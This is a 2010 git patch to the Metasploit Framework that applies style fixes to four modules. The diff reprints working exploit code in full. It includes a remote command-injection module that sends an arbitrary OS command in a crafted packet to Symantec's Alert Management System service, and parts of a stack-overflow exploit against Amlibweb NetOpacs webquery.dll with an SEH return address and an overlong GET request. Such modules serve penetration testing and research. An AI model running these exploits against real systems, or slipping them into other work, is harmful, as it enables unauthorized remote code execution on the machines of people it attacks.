From b473cda7d975b737feeca3443e34c17593d41b64 Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Tue, 3 Aug 2010 16:17:43 +0000
Subject: [PATCH] style compliance fixes

git-svn-id: file:///home/svn/framework3/trunk@9953 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../auxiliary/admin/symantec/ams_hndlrsvc.rb  | 179 +++++++++---------
 modules/auxiliary/admin/symantec/ams_xfr.rb   |   4 +-
 .../windows/ftp/easyftp_list_fixret.rb        |   4 +-
 .../windows/http/amlibweb_webquerydll_app.rb  |  62 +++---
 4 files changed, 125 insertions(+), 124 deletions(-)

diff --git a/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb b/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb
index e568352e3c..65ffef9a7b 100644
--- a/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb
+++ b/modules/auxiliary/admin/symantec/ams_hndlrsvc.rb
@@ -1,5 +1,5 @@
 ##
-# $Id: ams_hndlrsvc.rb 9179 2010-04-30 08:40:19Z mc $
+# $Id$
 ##
 
 ##
@@ -22,11 +22,11 @@ class Metasploit3 < Msf::Auxiliary
 			'Name'           => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
 			'Description'    => %q{
 					Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
-					because the application fails to properly sanitize user-supplied input.
+				because the application fails to properly sanitize user-supplied input.
 			},
 			'Author'         => [ 'MC' ],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: $',
+			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					[ 'OSVDB', '66807'],
@@ -35,101 +35,102 @@ class Metasploit3 < Msf::Auxiliary
 				],
 			'DisclosureDate' => 'Jul 26 2010'))
 
-			register_options(
-				[
-					Opt::RPORT(38292),
-					OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
-				], self.class)
+		register_options(
+			[
+				Opt::RPORT(38292),
+				OptString.new('CMD', [ false, 'The OS command to execute',
+					'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
+			], self.class)
 	end
 
 	def run
 		begin
 			connect
 
-				cmd = datastore['CMD']
-				
-				if ( cmd.length > 128 )
-					raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
-				end
+			cmd = datastore['CMD']
 
-				string_uno  = Rex::Text.rand_text_alpha_upper(11)
-				string_dos  = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
+			if ( cmd.length > 128 )
+				raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
+			end
 
-				packet =  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
-				packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
-				packet << "\xe8\x03\x00\x00"
-				packet << 'PRGXCNFG'
-				packet << "\x10\x00\x00\x00"
-				packet << "\x00\x00\x00\x00\x04"
-				packet << 'ALHD\F'
-				packet << "\x00\x00\x01\x00\x00"
-				packet << "\x00\x01\x00\x0e\x00"
-				packet << 'Risk Repaired'
-				packet << "\x00\x25\x00"
-				packet << 'Symantec Antivirus Corporate Edition'
-				packet << "\x00\xf9\x1d\x13\x4a\x3f"
-				packet << [string_uno.length + 1].pack('v') + string_uno 
-				packet << "\x00\x08\x08\x0a"
-				packet << "\x00" + 'Risk Name' 
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos 
-				packet << "\x00\x08\x0a\x00"
-				packet << 'File Path'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos
-				packet << "\x00\x08\x11\x00"
-				packet << 'Requested Action'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos 
-				packet << "\x00\x08\x0e\x00"
-				packet << 'Actual Action'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos
-				packet << "\x00\x08\x07\x00"
-				packet << 'Logger'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos 
-				packet << "\x00\x08\x05\x00"
-				packet << 'User'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos
-				packet << "\x00\x08\x09\x00"
-				packet << 'Hostname'
-				packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
-				packet << "\x00\x08\x13\x00"
-				packet << 'Corrective Actions'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos
-				packet << "\x00\x00\x07\x08\x12\x00"
-				packet << 'ConfigurationName'
-				packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
-				packet << "\x00" + cmd
-				packet << "\x00\x08\x0c\x00"
-				packet << 'CommandLine'
-				packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
-				packet << "\x00" + cmd
-				packet << "\x00\x08\x08\x00"
-				packet << 'RunArgs'
-				packet << "\x00\x04\x00\x02\x00"
-				packet << "\x20\x00\x03\x05\x00"
-				packet << 'Mode'
-				packet << "\x00\x04\x00\x02\x00\x00\x00"
-				packet << "\x0a\x0d\x00"
-				packet << 'FormatString'
-				packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
-				packet << 'ConfigurationName'
-				packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
-				packet << 'HandlerHost'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos
-				packet << "\x00" * packet.length
-				
-				print_status("Sending command: #{datastore['CMD']}")
-				sock.put(packet)
-				
-				disconnect
+			string_uno  = Rex::Text.rand_text_alpha_upper(11)
+			string_dos  = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
+
+			packet =  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
+			packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
+			packet << "\xe8\x03\x00\x00"
+			packet << 'PRGXCNFG'
+			packet << "\x10\x00\x00\x00"
+			packet << "\x00\x00\x00\x00\x04"
+			packet << 'ALHD\F'
+			packet << "\x00\x00\x01\x00\x00"
+			packet << "\x00\x01\x00\x0e\x00"
+			packet << 'Risk Repaired'
+			packet << "\x00\x25\x00"
+			packet << 'Symantec Antivirus Corporate Edition'
+			packet << "\x00\xf9\x1d\x13\x4a\x3f"
+			packet << [string_uno.length + 1].pack('v') + string_uno
+			packet << "\x00\x08\x08\x0a"
+			packet << "\x00" + 'Risk Name'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x0a\x00"
+			packet << 'File Path'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x11\x00"
+			packet << 'Requested Action'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x0e\x00"
+			packet << 'Actual Action'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x07\x00"
+			packet << 'Logger'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x05\x00"
+			packet << 'User'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x09\x00"
+			packet << 'Hostname'
+			packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
+			packet << "\x00\x08\x13\x00"
+			packet << 'Corrective Actions'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x00\x07\x08\x12\x00"
+			packet << 'ConfigurationName'
+			packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
+			packet << "\x00" + cmd
+			packet << "\x00\x08\x0c\x00"
+			packet << 'CommandLine'
+			packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
+			packet << "\x00" + cmd
+			packet << "\x00\x08\x08\x00"
+			packet << 'RunArgs'
+			packet << "\x00\x04\x00\x02\x00"
+			packet << "\x20\x00\x03\x05\x00"
+			packet << 'Mode'
+			packet << "\x00\x04\x00\x02\x00\x00\x00"
+			packet << "\x0a\x0d\x00"
+			packet << 'FormatString'
+			packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
+			packet << 'ConfigurationName'
+			packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
+			packet << 'HandlerHost'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00" * packet.length
+
+			print_status("Sending command: #{datastore['CMD']}")
+			sock.put(packet)
+
+			disconnect
 		rescue ::Exception
-		print_error("Error: #{$!.class} #{$!}")
+			print_error("Error: #{$!.class} #{$!}")
 		end
 	end
 end
diff --git a/modules/auxiliary/admin/symantec/ams_xfr.rb b/modules/auxiliary/admin/symantec/ams_xfr.rb
index 736e82cf1f..810b265cc6 100644
--- a/modules/auxiliary/admin/symantec/ams_xfr.rb
+++ b/modules/auxiliary/admin/symantec/ams_xfr.rb
@@ -1,5 +1,5 @@
 ##
-# $Id: ams_xfr.rb 9179 2010-04-30 08:40:19Z jduck $
+# $Id$
 ##
 
 ##
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
 			},
 			'Author'         => [ 'MC' ],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9179 $',
+			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					[ 'CVE', '2009-1429' ],
diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb
index 9476bd2963..3f1594e55e 100644
--- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb
+++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.
 				credit goes to Karn Ganeshan.
 
-				NOTE: Although, this is likely to exploit the same vulnerability as the 
+				NOTE: Although, this is likely to exploit the same vulnerability as the
 				'easyftp_cwd_fixret' exploit, it uses a slightly different vector.
 			},
 			'Author'         =>
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if (banner =~ /BigFoolCat/)
 			return Exploit::CheckCode::Vulnerable
 		end
-			return Exploit::CheckCode::Safe
+		Exploit::CheckCode::Safe
 	end
 
 	def exploit
diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
index c98d6283b9..ac129accf5 100644
--- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
+++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
@@ -20,30 +20,30 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		=> 'Amlibweb NetOpacs webquery.dll Stack Overflow',
-			'Description'	=> %q{
-			This module exploits a stack overflow in Amlib's Amlibweb
-			Library Management System (NetOpacs). The webquery.dll
-			API is available through IIS requests. By specifying
-			an overly long string to the 'app' parameter, SeH can be
-			reliably overwritten allowing for arbitrary remote code execution.
-			In addition, it is possible to overwrite EIP by specifying
-			an arbitrary parameter name with an '=' terminator.
+			'Name'         => 'Amlibweb NetOpacs webquery.dll Stack Overflow',
+			'Description'  => %q{
+					This module exploits a stack overflow in Amlib's Amlibweb
+				Library Management System (NetOpacs). The webquery.dll
+				API is available through IIS requests. By specifying
+				an overly long string to the 'app' parameter, SeH can be
+				reliably overwritten allowing for arbitrary remote code execution.
+				In addition, it is possible to overwrite EIP by specifying
+				an arbitrary parameter name with an '=' terminator.
 			},
-			'Author' 	=> [ 'patrick' ],
-			'Arch'		=> [ ARCH_X86 ],
-			'License'       => MSF_LICENSE,
-			'Version'       => '$Revision$',
-			'References'    =>
-			[
-				[ 'OSVDB', '66814'],
-				[ 'URL', 'http://www.aushack.com/advisories/' ],
-			],
+			'Author'       => [ 'patrick' ],
+			'Arch'         => [ ARCH_X86 ],
+			'License'      => MSF_LICENSE,
+			'Version'      => '$Revision$',
+			'References'   =>
+				[
+					[ 'OSVDB', '66814'],
+					[ 'URL', 'http://www.aushack.com/advisories/' ],
+				],
 			'Privileged'		=> true,
 			'DefaultOptions'	=>
-			{
-				'EXITFUNC'	=> 'thread',
-			},
+				{
+					'EXITFUNC'	=> 'thread',
+				},
 			'Payload'		=>
 				{
 					'Space'			=> 600,
@@ -54,15 +54,15 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Platform' => ['win'],
 			'Targets'  =>
-			[
-				# patrickw - Tested OK 20100803 w2k IIS5 
-				[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
-				# [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
-			],
+				[
+					# patrickw - Tested OK 20100803 w2k IIS5
+					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
+					# [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
+				],
 			'DisclosureDate' => 'Aug 03 2010', #0day
 			'DefaultTarget' => 0))
 
-			register_options(
+		register_options(
 			[
 				Opt::RPORT(80),
 			],self.class)
@@ -70,9 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		connect
-		
+
 		rand = Rex::Text.rand_text_alpha(10)
-		
+
 		sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n")
 		res = sock.get(-1,3)
 		disconnect
@@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote
 				return Exploit::CheckCode::Vulnerable
 			end
 		end
-			return Exploit::CheckCode::Safe
+		Exploit::CheckCode::Safe
 	end
 
 	def exploit
 		connect
 		seh = generate_seh_payload(target.ret)
 
-		buffer = Rex::Text.rand_text_alphanumeric(3028) + seh 
+		buffer = Rex::Text.rand_text_alphanumeric(3028) + seh
 		sploit = "GET /amlibweb/webquery.dll?app="  + buffer + " HTTP/1.0\r\n"
 		sock.put(sploit + "\r\n\r\n")